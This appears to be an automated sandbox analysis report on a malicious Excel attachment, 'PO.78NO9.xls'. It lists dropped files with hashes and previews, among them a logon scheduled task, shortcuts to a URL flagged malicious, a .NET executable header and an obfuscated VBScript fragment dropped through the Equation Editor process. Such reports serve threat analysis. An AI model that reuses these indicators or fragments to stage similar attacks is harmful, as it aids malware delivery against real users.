                                                                                                                                                                                      SHA-512:FCDFE34637EC9AB9F284BC4E6D7411D7A0545C388AD4B26B425A502DF40A5238868D1394E6C37425B276DC0F981F9A87F954DB335154BB3779F28C60A9B5223E
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:1
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:1
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):131072
                                                                                                                                                                                      Entropy (8bit):0.025547633048975373
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:I3DPc1wuT5JzRvxggLRJ075pRXv//4tfnRujlw//+GtluJ/eRuj:I3DPkwu9bt0tHvYg3J/
                                                                                                                                                                                      MD5:4042A292385DF8F186B5C054491ACD0A
                                                                                                                                                                                      SHA1:15DA9AD1EAF3DC99679AB1B68393C4F4109AFC90
                                                                                                                                                                                      SHA-256:AF884FD136A3CBA99547E1078BDFF203465E2FCB12AF0E1A788A5138A09AE516
                                                                                                                                                                                      SHA-512:DFAD22BF16D892C145C3DDBF5DA164DD7E1445100764378575F8BC7E1177CE4924AD71363FA0D4C1264A481BC54F9B1D705FB9CB9F20FCAD9D435C137A659ABB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:......M.eFy...zrU.D0P.M.....E..S,...X.F...Fa.q...............................8.%H................/]....D..].........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):131072
                                                                                                                                                                                      Entropy (8bit):0.025392573180350965
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:I3DPc6fpZC3FvxggLRZjzdN9P0RXv//4tfnRujlw//+GtluJ/eRuj:I3DPdfpKpp9wvYg3J/
                                                                                                                                                                                      MD5:9381F730953B38228CCDD4A1DCE0ADAE
                                                                                                                                                                                      SHA1:0AD80432DB9D71A0EF335251D46E77868B207712
                                                                                                                                                                                      SHA-256:6FD459C12DACF066E5988C6FA4F58D859A25C6F737442E04015C3058A5A050D5
                                                                                                                                                                                      SHA-512:5A5B8564401C962F271CBA602B84673B80ADC23CCCFA349301C200B54019A36EC01CB675A61DBC5F8368D6AB7DF5E57E9977582AF6B4DBE2EFAFF3DBA994AE55
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:......M.eFy...z.X."...J.....(.US,...X.F...Fa.q..............................i..H.....s.I............l.B.>.K.........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                      Entropy (8bit):0.30405640769210357
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:Q1YB6ypFn/RyeukKJil/UVlMyrdgKOB3gl3dDl1c3WhzMakrG41kvp:FUPeu6lGgFBgzceLh41kvp
                                                                                                                                                                                      MD5:5F353B9476F4D37690421126EA13EA44
                                                                                                                                                                                      SHA1:4045D89C0A9660613D88ADC1C8B39ADF1C7F476B
                                                                                                                                                                                      SHA-256:350DD9F7C2A4D4533761CADE01632429D303A65155BC9222B31A9448785BFA71
                                                                                                                                                                                      SHA-512:3D2BEC3F8E6986CA27F5FCDA34DAEF372509453E6F50F743D201D1B2A214176D58F3ED1F49A7B7E6947EE2CEE279E331CAB657F82226FE35AD4D87A06197205D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://m2g.me/a080>), ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):45
                                                                                                                                                                                      Entropy (8bit):4.624751985026256
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:HRAbABGQYm2fTrXy:HRYFVm4Tu
                                                                                                                                                                                      MD5:0F1A7C285D2E982A5A2B890AE69D0715
                                                                                                                                                                                      SHA1:0B59F828D6ECC13570CB52B48A9EBC9C406CD02F
                                                                                                                                                                                      SHA-256:44B34713B7CBD97C4A62BD3CBF252E275C66498B77834BA0704E346B49F24F8F
                                                                                                                                                                                      SHA-512:3C0AFD61D001E932F10961FD48D3EA7B8DB6E154F753980376C7F877F7213DD08DE44162119ADAFA73353621355840A5461F2A27F90E4C416CB7A51D6E77EC15
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Preview:[InternetShortcut]..URL=https://m2g.me/a080..
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      File Type:Generic INItialization configuration [xls]
                                                                                                                                                                                      Category:modified
                                                                                                                                                                                      Size (bytes):76
                                                                                                                                                                                      Entropy (8bit):4.541472454605286
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:bDKKbiMULpzVomMl1LpzVov:bNiMazV65zVy
                                                                                                                                                                                      MD5:7C8F042E289791537AFAAFAA19F8DC89
                                                                                                                                                                                      SHA1:42F1EBB2603A828F809362785D5722103CE01F44
                                                                                                                                                                                      SHA-256:451061D93BBCE8BDA599FB1BF35131987899EEDB1B3E67DB9553B8FF2C4ACD83
                                                                                                                                                                                      SHA-512:D86C41134307F7680D832766C70BA6099413A98B0E99553F94B07F5101C547284CF86CBCD20245AFF1F5B39D19D804D8818D426942F17B5D442DB09EB45B6D56
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:[folders]..a080.url=0..m2g.me.url=0..PO.78NO9.LNK=0..[xls]..PO.78NO9.LNK=0..
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://m2g.me/>), ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                      Entropy (8bit):4.4546361507484775
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:HRAbABGQYm2fTl:HRYFVm4Tl
                                                                                                                                                                                      MD5:843DD0754B021F8B22D00099373E9CBA
                                                                                                                                                                                      SHA1:85D399E0A3770EFF869F18484F6BFCDCBDDEF492
                                                                                                                                                                                      SHA-256:62BFA602E851680D75C31E964FBF84293A356FADAAB6C5522E1C0F90192F46A1
                                                                                                                                                                                      SHA-512:0F8E24FDBFD7FE71CE7FD0A4E837C0ED179914C79914DFF458001EAFA432DF076AA2D68A7A04CFCC3F0AED23AE3E2BA60FE3C195B746D92F18533A83A1676D47
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Preview:[InternetShortcut]..URL=https://m2g.me/..
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):162
                                                                                                                                                                                      Entropy (8bit):2.503835550707525
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                                                                                                                                                                                      MD5:CB3D0F9D3F7204AF5670A294AB575B37
                                                                                                                                                                                      SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                                                                                                                                                                                      SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                                                                                                                                                                                      SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):45160
                                                                                                                                                                                      Entropy (8bit):6.116594536419729
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:fwNAPwxabK/7YyoodyJ8Ood06xKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+ME:iYGn//oAKod926Iq8w20lIUUimBBI
                                                                                                                                                                                      MD5:04AA198D72229AEED129DC20201BF030
                                                                                                                                                                                      SHA1:17147A1A7417943A5BEAA002E304ADD3D6D67EA7
                                                                                                                                                                                      SHA-256:113C03899AAAF8CE4A4083DD254431348A937A0F0A4733C9C83B50E0F02E3C38
                                                                                                                                                                                      SHA-512:96B2EBCE7E267BE48743948C90D75F615275B2214DC1D05B41B5E7E0A9688A6FE9EB9049648D647D5FE119A41ACF8BBDE27AF4DA229A008C8916244A6D9761FA
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5p.\..............0..d............... ........@.. ....................................`.................................D...O.......$............r..h>........................................................... ............... ..H............text....b... ...d.................. ..`.rsrc...$............f..............@..@.reloc...............p..............@..B................x.......H........&..$R...........x..(............................................0..........(.....R.....&..(....(....(..........%.r...p.(....(....(....(....(....(......i.3..(....-.(.....*s.....(....r...p(......s......o ...-+r9..p(....(..........%...(....(............~P...-E.o!...-.rC..p(....(....+.(....(......&rM..p(....(.....................rW..po".....,...-+rk..p(....(..........%...(....(............o#...(....(...............(........-.......u........,$ru..p..o$.....o%.....o&...(
                                                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):194546
                                                                                                                                                                                      Entropy (8bit):3.7308893365983766
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:NgVXBa4xg3NmKaba5Vxgt5pOGwWXgy7UjT/GZYmlcnrtIhv4t:Ng9Ba4x2Nm05l3yq5Iit
                                                                                                                                                                                      MD5:E649435AF0F3788A713CD22749FE6B38
                                                                                                                                                                                      SHA1:7D1BCBAD5F789C559E1E04F427F778446C0D6388
                                                                                                                                                                                      SHA-256:730B7357EF72D30C42DC3A32EC8E7E82303C40FB6056875E50DE4F644B0F06F3
                                                                                                                                                                                      SHA-512:B55E31EDEE1DC1FEF0A87F5D5B4B0D8D6CDCFAFAE89214B2C4D8F76CA26053C18B631E819DFC36F11A2380280ACB906F2207047057016E2AB5C8791947EB6A64
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .l.y.c.a.n.t.h.r.o.p.i.a.(.e.n.a.n.t.h.e.m.a.,. .p.r.e.s.s.u.r.o.s.o.,. .p.u.x.i.r.u.m.,. .s.e.m.i.l.o.u.r.o.,. .e.x.h.i.b.i.c.i.o.n.i.s.m.o.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .p.u.x.i.r.u.m...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .p.u.x.i.r.u.m...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .p.u.x.i.r.u.m...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .p.u.x.i.r.u.m...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . . . .I.f. .L.C.a.s.e.(.d.
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 7 06:15:10 2024, Security: 1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1101824
                                                                                                                                                                                      Entropy (8bit):7.300720188844151
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:FmzHJEHAfwu4hzD3DERnLRmF8DNtrf1Y3dWFuIeMxWjTg3Y91jH5FRrudtAJoVD:cLw/hzbARM8zi35Tg3CD5ao
                                                                                                                                                                                      MD5:8FBDDA5C05722ED1A7C5DB5B96E46B2F
                                                                                                                                                                                      SHA1:5A5673A5777F78B3EA8E2A2F11AFADFE8B803C56
                                                                                                                                                                                      SHA-256:D3A9F799092B89F173B75997C42C401A0B573835AD1AD04E9BB1BD02F0BFE451
                                                                                                                                                                                      SHA-512:628AD9D3F40868116CF6132A74159726E511EDDA3B528B526A27DE73B04920B2327586C6A546BB9B8D7E466324BC593B9AA1E50F5817C3241A2F2641D4E583E5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:......................>...............................................................................;.......................h.......j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):26
                                                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 7 06:15:10 2024, Security: 1
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1101824
                                                                                                                                                                                      Entropy (8bit):7.300720188844151
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:FmzHJEHAfwu4hzD3DERnLRmF8DNtrf1Y3dWFuIeMxWjTg3Y91jH5FRrudtAJoVD:cLw/hzbARM8zi35Tg3CD5ao
                                                                                                                                                                                      MD5:8FBDDA5C05722ED1A7C5DB5B96E46B2F
                                                                                                                                                                                      SHA1:5A5673A5777F78B3EA8E2A2F11AFADFE8B803C56
                                                                                                                                                                                      SHA-256:D3A9F799092B89F173B75997C42C401A0B573835AD1AD04E9BB1BD02F0BFE451
                                                                                                                                                                                      SHA-512:628AD9D3F40868116CF6132A74159726E511EDDA3B528B526A27DE73B04920B2327586C6A546BB9B8D7E466324BC593B9AA1E50F5817C3241A2F2641D4E583E5
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Preview:......................>...............................................................................;.......................h.......j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 7 02:23:51 2024, Security: 1
                                                                                                                                                                                      Entropy (8bit):7.262903287999066
                                                                                                                                                                                      TrID:
                                                                                                                                                                                      • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                                                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                                                      File name:PO.78NO9.xls
                                                                                                                                                                                      File size:1'095'168 bytes
                                                                                                                                                                                      MD5:f4d2762d6fc4b70c3c88ab984e74d7cf
                                                                                                                                                                                      SHA1:ce98c26ec0a34cd39337e94afb3d5cc8409bf944
                                                                                                                                                                                      SHA256:781b57f2c750077fea3540b45ab5be0a9f1eac03b02d5ebbd89e4558ec130e50
                                                                                                                                                                                      SHA512:ef45f9b19375bb20710d0f7dac3225ae5bd1e5bec1a8871f8f6764dde5a9557b01423e2cca4b7622306b92fb5f5e0b11e4797361c893556742bec06901b4f1e3
                                                                                                                                                                                      SSDEEP:12288:1mzHJEHAfwu4huD3DERnLRmF8DbPrf1f3dyFum4gwJ3xMuyOHKqv/61FHPmLX2gV:sLw/hubARM8Th3jLaDvFvmLGprPU
                                                                                                                                                                                      TLSH:D035DF83AA1D4F62CE41423066F7177A1324DC43D622872B22F5772839FBAD06956FED
                                                                                                                                                                                      File Content Preview:........................>...............................................................................<.......................j.......l......................................................................................................................
                                                                                                                                                                                      Icon Hash:276ea3a6a6b7bfbf
                                                                                                                                                                                      Document Type:OLE
                                                                                                                                                                                      Number of OLE Files:1
                                                                                                                                                                                      Has Summary Info:
                                                                                                                                                                                      Application Name:Microsoft Excel
                                                                                                                                                                                      Encrypted Document:True
                                                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                                                      Contains Workbook/Book Stream:True
                                                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                                                      Contains ObjectPool Stream:False
                                                                                                                                                                                      Flash Objects Count:0
                                                                                                                                                                                      Contains VBA Macros:True
                                                                                                                                                                                      Code Page:1252
                                                                                                                                                                                      Author:
                                                                                                                                                                                      Last Saved By:
                                                                                                                                                                                      Create Time:2006-09-16 00:00:00
                                                                                                                                                                                      Last Saved Time:2024-10-07 01:23:51
                                                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                                                      Security:1
                                                                                                                                                                                      Document Code Page:1252
                                                                                                                                                                                      Thumbnail Scaling Desired:False
                                                                                                                                                                                      Contains Dirty Links:False
                                                                                                                                                                                      Shared Document:False
                                                                                                                                                                                      Changed Hyperlinks:False
                                                                                                                                                                                      Application Version:786432
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                                                      VBA File Name:Sheet1.cls
                                                                                                                                                                                      Stream Size:977
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ V . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                                                                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5e 56 92 fd 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                      Attribute VB_Name = "Sheet1"
                                                                                                                                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                      Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                      Attribute VB_Creatable = False
                                                                                                                                                                                      Attribute VB_PredeclaredId = True
                                                                                                                                                                                      Attribute VB_Exposed = True
                                                                                                                                                                                      Attribute VB_TemplateDerived = False
                                                                                                                                                                                      Attribute VB_Customizable = True
                                                                                                                                                                                      

                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                                                                      VBA File Name:Sheet2.cls
                                                                                                                                                                                      Stream Size:977
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ V . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                                                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5e 56 04 8e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                      Attribute VB_Name = "Sheet2"
                                                                                                                                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                      Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                      Attribute VB_Creatable = False
                                                                                                                                                                                      Attribute VB_PredeclaredId = True
                                                                                                                                                                                      Attribute VB_Exposed = True
                                                                                                                                                                                      Attribute VB_TemplateDerived = False
                                                                                                                                                                                      Attribute VB_Customizable = True
                                                                                                                                                                                      

                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                                                                                      VBA File Name:Sheet3.cls
                                                                                                                                                                                      Stream Size:977
